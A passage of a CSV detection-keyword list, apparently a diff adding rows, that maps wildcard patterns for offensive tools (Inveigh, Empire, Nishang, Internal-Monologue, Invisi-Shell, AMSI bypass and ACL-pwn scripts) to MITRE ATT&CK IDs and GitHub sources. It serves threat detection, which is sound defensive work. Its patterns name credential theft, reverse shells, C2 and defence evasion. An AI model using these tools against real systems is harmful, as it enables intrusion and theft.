out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*Intercepter-NG*","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--interface * --wpad --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Internal-Monologue.exe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternalMonologueDll*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternalMonologueExe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3430","1189","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" +"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Inveigh.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.psd1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.psm1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.sln*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*inveigh_version*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh-Cleartext.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-FormInput.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-Log.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-master*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-net*.zip*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-NTLMv1.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-NTLMv2.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh-Relay.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*inveighzero.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*InvisibilityCloak.py*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"*Invisi-Shell*","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1059 - T1053 - T1027 - T1055 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","921","143","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" +"*invoke obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*invoke* -Action command -Execute * -Session*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*invoke_obfuscation.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Invoke-AccessCheckForAllGroups*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForAllServicePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForAllUsers*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForCurrentUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForCurrentUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForGroup*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForServicePrincipal*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-ACLcsvFileAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Invoke-ACLPwn*","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","5","498","86","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z" +"*Invoke-ACLScanner * -Filter *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Invoke-ACLScanner * -Name *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-ADSBackdoor*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-AllAccessChecks*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AllChecks*","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" 